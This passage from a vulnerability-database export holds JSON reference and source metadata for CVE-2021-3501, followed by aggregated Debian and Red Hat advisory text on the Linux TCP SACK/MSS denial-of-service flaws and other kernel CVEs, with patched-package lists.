        "url": "https://access.redhat.com/security/cve/cve-2020-28196"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15358"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15358"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21639"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12364"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28165"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14502"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28092"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13434"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25037"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13776"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25037"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-3842"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13776"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24977"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12363"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8231"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10878"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-29362"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24330"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28935"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28163"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13434"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-14502"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25034"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8285"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25035"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10228"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-9169"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-14866"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-26116"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25038"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14866"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-26137"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25013"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21309"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25040"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21640"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-29361"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28918"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24330"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25042"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25042"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12362"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25648"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25038"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25032"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25041"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8648"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25036"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25032"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-27619"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-27170"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-25215"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3177"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9169"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24331"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25692"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3326"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25036"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25013"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25035"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-2708"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23336"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-2433"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8927"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10543"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3347"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12362"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12363"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-29363"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24332"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3114"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28362"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3842"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10543"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25039"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25040"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12364"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2708"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-10228"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10878"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25041"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2461"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8284"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25034"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-27618"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3121"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2286"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3121"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhba-2287"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/updating/updating-cluster"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24489"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3560"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2522"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/2974891"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24489"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3560"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2169"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2165"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2168"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29155"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31829"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33200"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem-5.10/5.10.0-1029.30"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4983-1"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-391161"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-3501"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006584"
      },
      {
        "db": "PACKETSTORM",
        "id": "163188"
      },
      {
        "db": "PACKETSTORM",
        "id": "163149"
      },
      {
        "db": "PACKETSTORM",
        "id": "163242"
      },
      {
        "db": "PACKETSTORM",
        "id": "162881"
      },
      {
        "db": "PACKETSTORM",
        "id": "162882"
      },
      {
        "db": "PACKETSTORM",
        "id": "162890"
      },
      {
        "db": "PACKETSTORM",
        "id": "162977"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-271"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-3501"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-391161"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-3501"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006584"
      },
      {
        "db": "PACKETSTORM",
        "id": "163188"
      },
      {
        "db": "PACKETSTORM",
        "id": "163149"
      },
      {
        "db": "PACKETSTORM",
        "id": "163242"
      },
      {
        "db": "PACKETSTORM",
        "id": "162881"
      },
      {
        "db": "PACKETSTORM",
        "id": "162882"
      },
      {
        "db": "PACKETSTORM",
        "id": "162890"
      },
      {
        "db": "PACKETSTORM",
        "id": "162977"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-271"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-3501"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-05-06T00:00:00",
        "db": "VULHUB",
        "id": "VHN-391161"
      },
      {
        "date": "2021-05-06T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-3501"
      },
      {
        "date": "2022-01-13T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-006584"
      },
      {
        "date": "2021-06-17T17:53:22",
        "db": "PACKETSTORM",
        "id": "163188"
      },
      {
        "date": "2021-06-15T14:59:25",
        "db": "PACKETSTORM",
        "id": "163149"
      },
      {
        "date": "2021-06-22T19:34:25",
        "db": "PACKETSTORM",
        "id": "163242"
      },
      {
        "date": "2021-06-01T15:03:46",
        "db": "PACKETSTORM",
        "id": "162881"
      },
      {
        "date": "2021-06-01T15:04:05",
        "db": "PACKETSTORM",
        "id": "162882"
      },
      {
        "date": "2021-06-01T15:11:57",
        "db": "PACKETSTORM",
        "id": "162890"
      },
      {
        "date": "2021-06-04T13:47:07",
        "db": "PACKETSTORM",
        "id": "162977"
      },
      {
        "date": "2021-05-06T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202105-271"
      },
      {
        "date": "2021-05-06T13:15:12.840000",
        "db": "NVD",
        "id": "CVE-2021-3501"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-05-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-391161"
      },
      {
        "date": "2021-05-14T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-3501"
      },
      {
        "date": "2022-01-13T08:56:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-006584"
      },
      {
        "date": "2021-06-17T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202105-271"
      },
      {
        "date": "2022-05-13T20:52:55.127000",
        "db": "NVD",
        "id": "CVE-2021-3501"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "162977"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-271"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux\u00a0Kernel\u00a0 Out-of-bounds Vulnerability in Microsoft",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006584"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-271"
      }
    ],
    "trust": 0.6
  }
}

var-201906-1174
Vulnerability from variot

Jonathan Looney discovered that the Linux kernel default MSS is hard-coded to 48 bytes. This allows a remote peer to fragment TCP resend queues significantly more than if a larger MSS were enforced. A remote attacker could use this to cause a denial of service. This has been fixed in stable kernel releases 4.4.182, 4.9.182, 4.14.127, 4.19.52, 5.1.11, and is fixed in commits 967c05aee439e6e5d7d805e195b3a20ef5c433d6 and 5f3e2bf008c2221478101ee72f5cb4654b9fc363. Multiple TCP Selective Acknowledgement (SACK) and Maximum Segment Size (MSS) networking vulnerabilities may cause denial-of-service conditions in Linux and FreeBSD kernels. This vulnerability stems from improper management of system resources (such as memory, disk space, files, etc.) by network systems or products. A successful exploit could cause the targeted system to crash, resulting in a DoS condition. Proof-of-concept (PoC) code that demonstrates an exploit of this vulnerability is publicly available. Kernel.org has confirmed the vulnerability and released software updates.

Bug Fix(es):

  • update the MRG 2.5.z 3.10 kernel-rt sources (BZ#1711010)

  • Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

CVE-2019-3846, CVE-2019-10126

huangwen reported multiple buffer overflows in the Marvell wifi
(mwifiex) driver, which a local user could use to cause denial of
service or the execution of arbitrary code.

CVE-2019-5489

Daniel Gruss, Erik Kraft, Trishita Tiwari, Michael Schwarz, Ari
Trachtenberg, Jason Hennessey, Alex Ionescu, and Anders Fogh
discovered that local users could use the mincore() system call to
obtain sensitive information from other processes that access the
same memory-mapped file.

This update introduces a new sysctl value to control the minimal MSS
(net.ipv4.tcp_min_snd_mss), which by default uses the formerly hard-
coded value of 48.  We recommend raising this to 536 unless you know
that your network requires a lower value.

CVE-2019-11486

Jann Horn of Google reported numerous race conditions in the
Siemens R3964 line discipline. This module has therefore been
disabled.

CVE-2019-11599

Jann Horn of Google reported a race condition in the core dump
implementation which could lead to a use-after-free.

CVE-2019-11815

It was discovered that a use-after-free in the Reliable Datagram
Sockets protocol could result in denial of service and potentially
privilege escalation.  This protocol module (rds) is not auto-
loaded on Debian systems, so this issue only affects systems where
it is explicitly loaded.

CVE-2019-11833

It was discovered that the ext4 filesystem implementation writes
uninitialised data from kernel memory to new extent blocks.  A
local user able to write to an ext4 filesystem and then read the
filesystem image, for example using a removable drive, might be
able to use this to obtain sensitive information.

CVE-2019-11884

It was discovered that the Bluetooth HIDP implementation did not
ensure that new connection names were null-terminated.  A local
user with CAP_NET_ADMIN capability might be able to use this to
obtain sensitive information from the kernel stack.

For the detailed security status of linux please refer to its security tracker page at: https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAl0H04lfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0Tszw//R1zmUfrItTVMKsH3SlhMG/Nyd1efD/MaYwK/MXHv02BH56G3Th/W1uxh MEjyYTs7gE/UNyx6mr90G/BvymKNCqMEk5ooT7+xXcIgfBi+qvQW/YoBSOFi+Gai 58ofw0En+OQ4Fs1J95XRFjgegBitnsBumMxDcn2adKsbr7s8mKDaesENuXGe7sam Da8T6b0akCWK1i85JsQMG3OI661EdjosDHFHJyCVo8L1q3guYG11GPVlT/TI1ErN 68dVqLWq01Vn5TjKaUr6xeAHDMma+fKaHaitnxhmt06AcH/zQo4wDocQx8DOEWpE 6xBcCyABkKQ84iTKrFZKcnBDCwHaEcq6UytqIbkXIGpA0jRgaLzCNEOWt9GuENmt YoaxXwIi9RSMe8flyrWURGyWLrfJkh/Bk/P6WlpOCMSJmB9uXTnPxjMpfoMNqQjs BljbGqeN06dvFAq1fMzlqykbeHzDksHZ4pZizMNYqCNdQs3erm0rdyS55mN60o5/ SDIur1KokXi60zTwDPne1tyh00EP0liWyvh79u2/kaIazjbtTtoVYlyF5Wm/pu/r E46Mpv8pI7YIDNUVrtM/vLznqq+4BcVaqLBIVeMf+XAfqxJ5IrZ4ejaPvlP7hi4+ NwCQrSCaGk2nwBZr6Xs0qYVTsLLY9jkg8FUWPdH4ZEOFcGaWi3A=dgfy -----END PGP SIGNATURE----- . 8) - aarch64, noarch, ppc64le, s390x, x86_64

Bug Fix(es):

  • [HPE 8.0 Bug] nvme drive power button does not turn off drive (BZ#1700288)

  • RHEL8.0 - hw csum failure seen in dmesg and console (using mlx5/mlx4/Mellanox) (BZ#1700289)

  • RHEL8.0 - vfio-ap: add subsystem to matrix device to avoid libudev failures (kvm) (BZ#1700290)

  • [FJ8.1 Bug]: Make Fujitsu Erratum 010001 patch work on A64FX v1r0 (BZ#1700901)

  • [FJ8.0 Bug]: Fujitsu A64FX processor errata - panic by unknown fault (BZ#1700902)

  • RHEL 8.0 Snapshot 4 - nvme create-ns command hangs after creating 20 namespaces on Bolt (NVMe) (BZ#1701140)

  • [Cavium/Marvell 8.0 qed] Fix qed_mcp_halt() and qed_mcp_resume() (backporting bug) (BZ#1704184)

  • [Intel 8.1 Bug] PBF: Base frequency display fix (BZ#1706739)

  • [RHEL8]read/write operation not permitted to /sys/kernel/debug/gcov/reset (BZ#1708100)

  • RHEL8.0 - ISST-LTE:pVM:fleetwood:LPM:raylp85:After lpm seeing the console logs on the the lpar at target side (BZ#1708102)

  • RHEL8.0 - Backport support for software count cache flush Spectre v2 mitigation (BZ#1708112)

  • [Regression] RHEL8.0 - System crashed with one stress-ng-mremap stressor on Boston (kvm host) (BZ#1708617)

  • [intel ice Rhel 8 RC1] ethtool -A ethx causes interfaces to go down (BZ#1709433)

  • -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2019:1485-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2019:1485 Issue date: 2019-06-17 CVE Names: CVE-2019-11477 CVE-2019-11478 CVE-2019-11479 ==================================================================== 1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.2 Advanced Update Support, Red Hat Enterprise Linux 7.2 Telco Extended Update Support, and Red Hat Enterprise Linux 7.2 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.2) - noarch, x86_64 Red Hat Enterprise Linux Server E4S (v. 7.2) - noarch, x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 7.2) - x86_64 Red Hat Enterprise Linux Server Optional E4S (v. 7.2) - x86_64 Red Hat Enterprise Linux Server Optional TUS (v. 7.2) - x86_64 Red Hat Enterprise Linux Server TUS (v. 7.2) - noarch, x86_64

  1. Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system. While processing SACK segments, the Linux kernel's socket buffer (SKB) data structure becomes fragmented. To efficiently process SACK blocks, the Linux kernel merges multiple fragmented SKBs into one, potentially overflowing the variable holding the number of segments. A remote attacker could use this flaw to crash the Linux kernel by sending a crafted sequence of SACK segments on a TCP connection with small value of TCP MSS, resulting in a denial of service (DoS). (CVE-2019-11477)

  • Kernel: tcp: excessive resource consumption while processing SACK blocks allows remote denial of service (CVE-2019-11478)

  • Kernel: tcp: excessive resource consumption for TCP connections with low MSS allows remote denial of service (CVE-2019-11479)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

  • THP: Race between MADV_DONTNEED and NUMA hinting node migration code (BZ#1698103)

  • [RHEL7] md_clear flag missing from /proc/cpuinfo on late microcode update (BZ#1712989)

  • [RHEL7] MDS mitigations are not enabled after double microcode update (BZ#1712994)

  • WARNING: CPU: 0 PID: 0 at kernel/jump_label.c:90 __static_key_slow_dec+0xa6/0xb0 (BZ#1713000)

  • Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1719123 - CVE-2019-11477 Kernel: tcp: integer overflow while processing SACK blocks allows remote denial of service 1719128 - CVE-2019-11478 Kernel: tcp: excessive resource consumption while processing SACK blocks allows remote denial of service 1719129 - CVE-2019-11479 Kernel: tcp: excessive resource consumption for TCP connections with low MSS allows remote denial of service

  1. Package List:

Red Hat Enterprise Linux Server AUS (v. 7.2):

Source: kernel-3.10.0-327.79.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-327.79.2.el7.noarch.rpm kernel-doc-3.10.0-327.79.2.el7.noarch.rpm

x86_64: kernel-3.10.0-327.79.2.el7.x86_64.rpm kernel-debug-3.10.0-327.79.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-327.79.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-327.79.2.el7.x86_64.rpm kernel-devel-3.10.0-327.79.2.el7.x86_64.rpm kernel-headers-3.10.0-327.79.2.el7.x86_64.rpm kernel-tools-3.10.0-327.79.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-327.79.2.el7.x86_64.rpm perf-3.10.0-327.79.2.el7.x86_64.rpm perf-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm python-perf-3.10.0-327.79.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm

Red Hat Enterprise Linux Server E4S (v. 7.2):

Source: kernel-3.10.0-327.79.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-327.79.2.el7.noarch.rpm kernel-doc-3.10.0-327.79.2.el7.noarch.rpm

x86_64: kernel-3.10.0-327.79.2.el7.x86_64.rpm kernel-debug-3.10.0-327.79.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-327.79.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-327.79.2.el7.x86_64.rpm kernel-devel-3.10.0-327.79.2.el7.x86_64.rpm kernel-headers-3.10.0-327.79.2.el7.x86_64.rpm kernel-tools-3.10.0-327.79.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-327.79.2.el7.x86_64.rpm perf-3.10.0-327.79.2.el7.x86_64.rpm perf-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm python-perf-3.10.0-327.79.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm

Red Hat Enterprise Linux Server TUS (v. 7.2):

Source: kernel-3.10.0-327.79.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-327.79.2.el7.noarch.rpm kernel-doc-3.10.0-327.79.2.el7.noarch.rpm

x86_64: kernel-3.10.0-327.79.2.el7.x86_64.rpm kernel-debug-3.10.0-327.79.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-327.79.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-327.79.2.el7.x86_64.rpm kernel-devel-3.10.0-327.79.2.el7.x86_64.rpm kernel-headers-3.10.0-327.79.2.el7.x86_64.rpm kernel-tools-3.10.0-327.79.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-327.79.2.el7.x86_64.rpm perf-3.10.0-327.79.2.el7.x86_64.rpm perf-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm python-perf-3.10.0-327.79.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.2):

x86_64: kernel-debug-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-327.79.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-327.79.2.el7.x86_64.rpm perf-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional E4S (v. 7.2):

x86_64: kernel-debug-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-327.79.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-327.79.2.el7.x86_64.rpm perf-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional TUS (v. 7.2):

x86_64: kernel-debug-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-327.79.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-327.79.2.el7.x86_64.rpm perf-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-327.79.2.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2019-11477 https://access.redhat.com/security/cve/CVE-2019-11478 https://access.redhat.com/security/cve/CVE-2019-11479 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/security/vulnerabilities/tcpsack

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

